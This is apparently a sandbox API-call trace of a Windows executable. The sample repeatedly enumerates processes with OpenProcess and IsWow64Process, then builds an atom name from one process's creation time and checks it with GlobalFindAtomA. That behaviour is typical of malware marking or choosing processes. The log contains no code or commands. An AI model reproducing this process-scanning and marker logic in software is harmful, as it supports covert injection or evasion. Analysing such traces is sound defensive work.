	[0090.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.545] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.545] CloseHandle (hObject=0x20c) returned 1
	[0090.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.546] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.546] CloseHandle (hObject=0x20c) returned 1
	[0090.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.546] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.546] CloseHandle (hObject=0x20c) returned 1
	[0090.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0090.546] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.546] CloseHandle (hObject=0x20c) returned 1
	[0090.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.546] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.547] CloseHandle (hObject=0x20c) returned 1
	[0090.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.547] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.547] CloseHandle (hObject=0x20c) returned 1
	[0090.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.547] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.547] CloseHandle (hObject=0x20c) returned 1
	[0090.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.547] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.547] CloseHandle (hObject=0x20c) returned 1
	[0090.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.547] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.547] CloseHandle (hObject=0x20c) returned 1
	[0090.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0090.548] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.548] CloseHandle (hObject=0x20c) returned 1
	[0090.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.548] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.548] CloseHandle (hObject=0x20c) returned 1
	[0090.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.548] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.548] CloseHandle (hObject=0x20c) returned 1
	[0090.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.548] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.548] CloseHandle (hObject=0x20c) returned 1
	[0090.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.548] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.548] CloseHandle (hObject=0x20c) returned 1
	[0090.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.548] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.548] CloseHandle (hObject=0x20c) returned 1
	[0090.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.549] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.549] CloseHandle (hObject=0x20c) returned 1
	[0090.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.549] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.549] CloseHandle (hObject=0x20c) returned 1
	[0090.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.549] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.549] CloseHandle (hObject=0x20c) returned 1
	[0090.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.549] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.549] CloseHandle (hObject=0x20c) returned 1
	[0090.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.549] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.549] CloseHandle (hObject=0x20c) returned 1
	[0090.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.549] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.549] CloseHandle (hObject=0x20c) returned 1
	[0090.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.550] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.550] CloseHandle (hObject=0x20c) returned 1
	[0090.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.550] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.550] CloseHandle (hObject=0x20c) returned 1
	[0090.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.550] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.550] CloseHandle (hObject=0x20c) returned 1
	[0090.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.550] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.550] CloseHandle (hObject=0x20c) returned 1
	[0090.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.550] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.550] CloseHandle (hObject=0x20c) returned 1
	[0090.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.551] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.551] CloseHandle (hObject=0x20c) returned 1
	[0090.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.551] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.551] CloseHandle (hObject=0x20c) returned 1
	[0090.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.551] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.551] CloseHandle (hObject=0x20c) returned 1
	[0090.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.551] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.551] CloseHandle (hObject=0x20c) returned 1
	[0090.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.552] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.552] CloseHandle (hObject=0x20c) returned 1
	[0090.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.552] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.552] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.552] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.552] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.552] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.553] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.553] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.553] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.553] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.553] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.553] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.554] CloseHandle (hObject=0x20c) returned 1
	[0090.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.554] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.554] CloseHandle (hObject=0x20c) returned 1
	[0090.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0090.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.626] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.626] CloseHandle (hObject=0x20c) returned 1
	[0090.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.627] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.627] CloseHandle (hObject=0x20c) returned 1
	[0090.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.627] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.627] CloseHandle (hObject=0x20c) returned 1
	[0090.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0090.627] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.627] CloseHandle (hObject=0x20c) returned 1
	[0090.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.627] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.627] CloseHandle (hObject=0x20c) returned 1
	[0090.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.627] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.627] CloseHandle (hObject=0x20c) returned 1
	[0090.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.628] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.628] CloseHandle (hObject=0x20c) returned 1
	[0090.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.628] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.628] CloseHandle (hObject=0x20c) returned 1
	[0090.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.628] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.628] CloseHandle (hObject=0x20c) returned 1
	[0090.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0090.628] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.628] CloseHandle (hObject=0x20c) returned 1
	[0090.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.628] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.628] CloseHandle (hObject=0x20c) returned 1
	[0090.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.629] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.629] CloseHandle (hObject=0x20c) returned 1
	[0090.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.629] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.629] CloseHandle (hObject=0x20c) returned 1
	[0090.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.629] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.629] CloseHandle (hObject=0x20c) returned 1
	[0090.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.629] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.629] CloseHandle (hObject=0x20c) returned 1
	[0090.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.629] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.629] CloseHandle (hObject=0x20c) returned 1
	[0090.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.630] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.630] CloseHandle (hObject=0x20c) returned 1
	[0090.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.630] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.630] CloseHandle (hObject=0x20c) returned 1
	[0090.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.630] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.630] CloseHandle (hObject=0x20c) returned 1
	[0090.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.630] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.630] CloseHandle (hObject=0x20c) returned 1
	[0090.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.630] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.630] CloseHandle (hObject=0x20c) returned 1
	[0090.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.630] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.630] CloseHandle (hObject=0x20c) returned 1
	[0090.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.631] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.631] CloseHandle (hObject=0x20c) returned 1
	[0090.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.631] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.631] CloseHandle (hObject=0x20c) returned 1
	[0090.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.631] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.631] CloseHandle (hObject=0x20c) returned 1
	[0090.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.631] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.631] CloseHandle (hObject=0x20c) returned 1
	[0090.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.631] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.631] CloseHandle (hObject=0x20c) returned 1
	[0090.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.632] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.632] CloseHandle (hObject=0x20c) returned 1
	[0090.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.632] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.632] CloseHandle (hObject=0x20c) returned 1
	[0090.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.632] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.632] CloseHandle (hObject=0x20c) returned 1
	[0090.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.632] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.632] CloseHandle (hObject=0x20c) returned 1
	[0090.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.633] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.633] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.633] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.633] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.633] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.634] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.634] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.634] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.634] CloseHandle (hObject=0x20c) returned 1
	[0090.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.634] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.634] CloseHandle (hObject=0x20c) returned 1
	[0090.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0090.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.707] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.707] CloseHandle (hObject=0x20c) returned 1
	[0090.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.708] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.708] CloseHandle (hObject=0x20c) returned 1
	[0090.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.708] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.708] CloseHandle (hObject=0x20c) returned 1
	[0090.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
